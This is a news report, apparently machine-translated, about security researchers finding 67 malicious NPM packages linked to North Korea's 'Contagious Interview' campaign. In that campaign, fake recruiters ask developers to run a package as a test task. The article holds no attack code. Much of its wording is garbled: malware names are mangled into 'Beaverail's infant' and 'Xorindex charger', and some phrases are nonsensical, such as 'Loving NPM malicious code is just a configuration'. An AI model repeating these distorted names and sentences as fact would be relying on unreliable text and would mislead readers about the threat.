- Security researchers saw 67 malicious packages in NPM
- Packages are part of the contagious interview campaign.
- Most likely, North Korean attackers deploy them
North Korean computer pirates have been seen pushing dozens of malicious packages to NPM in an attempt to compromise Western technological products through supply chain attacks.
Socket cybersecurity researchers claim that the last impulse of 67 malicious packages is only the second section of a previous attack, in which 35 packages were published, as part of a campaign called contagious interview.
“The contagious operation of the interview continues to follow a dynamic of Whack-A-Mole, where defenders detect and report malicious packages, and North Korean threat actors respond quickly by loading new variants using the same book books, similar or slightly evolved,” said Socket researcher Kirill Boychenko.
Thousands of victims
Loving NPM malicious code is just a configuration. The real attack probably occurs elsewhere: on LinkedIn, Telegram or Discord. The attackers of North Korea would be raised as recruiters, or human resources managers in large technological companies of good reputation, and would communicate with software developers that offer work.
The interview process includes multiple rounds of conversations and concludes with a trial task. This test assignment requires that the work search engine download and execute an NPM package, which is where the person ends with a committed device. Obviously, that does not mean that other people also cannot accidentally download contaminated packages.
Accumulatively, the packages attracted more than 17,000 downloads, which is an attack surface.
North Koreans are infamous for their false work and false employee scams, whose objectives generally vary between cyberdispone and financial robbery. If they are not stealing intellectual property or proprietary data, then they are stealing cryptocurrencies that the government uses to finance the state apparatus and its nuclear weapons program.
Campaigns implement all kinds of malware, from Beaverail’s infant, through Xorindex Loader, Hexeval and many others.
“The contagious interview threat actors will continue to diversify their malware portfolio, turning through new NPM maintenance alias, reusing loaders such as Hexeval Loader and malware families such as Beaverail and Invisibleferret, and actively deploying newly observed variants, including the Xorindex charger,” the researchers concluded.
Through The hacker news
